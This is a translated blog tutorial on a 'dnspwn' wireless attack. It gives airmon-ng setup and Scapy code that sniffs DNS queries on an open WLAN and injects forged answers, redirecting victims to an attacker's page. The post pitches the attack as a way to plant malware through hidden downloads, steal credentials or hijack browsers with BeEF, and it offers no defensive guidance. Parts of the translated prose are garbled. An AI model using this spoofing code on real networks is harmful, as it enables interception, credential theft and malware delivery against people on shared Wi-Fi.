Use Python for wireless attacks: Part 1-"Dnspwn attack"

Introduction

Not long ago, I published a blog post on the Raidersec blog about how to use Python and Scapy to bypass authentication attacks. I am very happy to write this article because I have not only learned how to use the aircrack suite, but also have the opportunity to deeply understand the differences in the operating methods of wireless attacks.

Therefore, as mentioned in this Article, this blog article will introduce a series of short and concise blog articles discussing how to use Python to implement common wireless attacks. As in the past, I hope you will appreciate this article and will not hesitate to let us know if you have the following comments or questions.

Dnspwn attack"

The first attack we will launch is called "dnspwn attack ". Because, in my opinion, this attack first uses the "airpwn" tool to create the target HTTP and then attack DNS .) The idea of this attack is very simple:

Suppose there are two people on an open WLAN: Bob and Eve. Eve wants Bob to access the malicious web page she created so that she can install malware on Bob's computer through hidden downloads, or a fraudulent website may be displayed to try to steal Bob's authentication information.

To implement this attack, she remembers that she can listen to all requests sent from or sent to Bob. She also knows that she is closer to Bob than the Web server Bob is requesting. Therefore, she decided to wait for Bob to send a Web request and see if she could send a fraudulent response before the real Web server responds to pretend that the response came from the web server. It turns out that she can do it. In fact, once a fraudulent response is received, Bob's computer may ignore any subsequent information, including the real response.

Let's take a look at the process, which looks as follows:

Therefore, since we already know how this attack runs, let us automate this attack.

Set Alfa AWUS06H wireless network card

Just like the example in my Raidersec blog post, we will use Alfa AWUS036H at hand to implement this attack. The first thing we need to do is to set the wireless network card in the monitoring mode, so that we can capture all the information flows from the demonstration of insecure networks.

 
 

  
  
root@bt:~# airmon-ng start wlan0 
 
 

Now that we have started the monitoring mode and run it on the mon0 interface, let's start coding!

Write attack code

We will use the scapy module to implement this attack. We started to listen to any UDP packet whose destination port is 53, and then sent this packet to us. Then we will write a function named send_response:

 
 

  
  
from scapy.all import * 
  
  
 
  
  
sniff(prn=lambda x: send_response(x), 
  
  
  lfilter=lambda x:x.haslayer(UDP) and x.dport == 53) 
 
 

Now, let's create a function that can parse the information in the request and inject the response. We only use the following layer-by-layer migration method to parse the package and create a response:

• 802.11 frame-change "to-ds" to "from-ds" (now our request will be from the Access Point)
• 802.11 frame-exchange source MAC address and destination MAC address
• IP layer-exchange source IP addresses and destination IP addresses
• UDP layer-exchange source port and destination port
• DNS layer-set the "answer" flag to add Spoofing

Fortunately, scapy makes it quite easy to abstract many secondary details. For example, in a 802.11 frame, there are actually four MAC address fields. Based on the packet direction, each type has a different order ). The Code is as follows:

 
 

  
  
def send_response(x): 
  
  
  # Get the requested domain 
  
  
  req_domain = x[DNS].qd.qname 
  
  
  spoofed_ip = '192.168.2.1' 
  
  
  # Let's build our response from a copy of the original packet 
  
  
  response = x.copy() 
  
  
  # We need to start by changing our response to be "from-ds", or from the access point. 
  
  
  response.FCfield = 2L 
  
  
  # Switch the MAC addresses 
  
  
  response.addr1, response.addr2 = x.addr2, x.addr1 
  
  
  # Switch the IP addresses 
  
  
  response.src, response.dst = x.dst, x.src 
  
  
  # Switch the ports 
  
  
  response.sport, response.dport = x.dport, x.sport 
  
  
  # Set the DNS flags 
  
  
  response[DNS].qr = 1L 
  
  
  response[DNS].ra = 1L 
  
  
  response[DNS].ancount = 1 
 
 

Now we have set all the flag, and then create and add the DNS response:

 
 

  
  
response[DNS].an = DNSRR( 
  
  
  rrname = req_domain, 
  
  
  type = 'A', 
  
  
  rclass = 'IN', 
  
  
  ttl = 900, 
  
  
  rdata = spoofed_ip 
  
  
  ) 
 
 

Finally, we inject this spoofing response:

 
 

  
  
sendp(response) 
 
 

This is all! You can find all source code on Github.

Demo

For this demonstration, I have the following HTML response from host 192.168.2.138:

 
 

  
  
 
  
 
  
<body> 
  
  
  Owned. 
  
  
</body> 
  
  
 
 

It is worth noting that we can addAnyWe want HTML, Javascript, and so on. For example, using the BeEF framework to hijack a browser is a piece of cake.

I am using my iPhone as the attacked party ):

 

Summary & Future improvements

Note that this attack method is also effective for other simple request/response protocols. For example, the original "airpwn" attack spoofs the HTTP response. We can further improve this script. The following are several aspects:

• Use regular expressions to match requests. For example, simply replace Javascript content)
• Use parameter setting options/read configuration information from the file
• Attacks that implement other protocols, such as HTTP ).

Enjoy!

Jordan

Http://www.oschina.net/translate/wireless-attacks-with-python-part-one-the-airpwn-attack.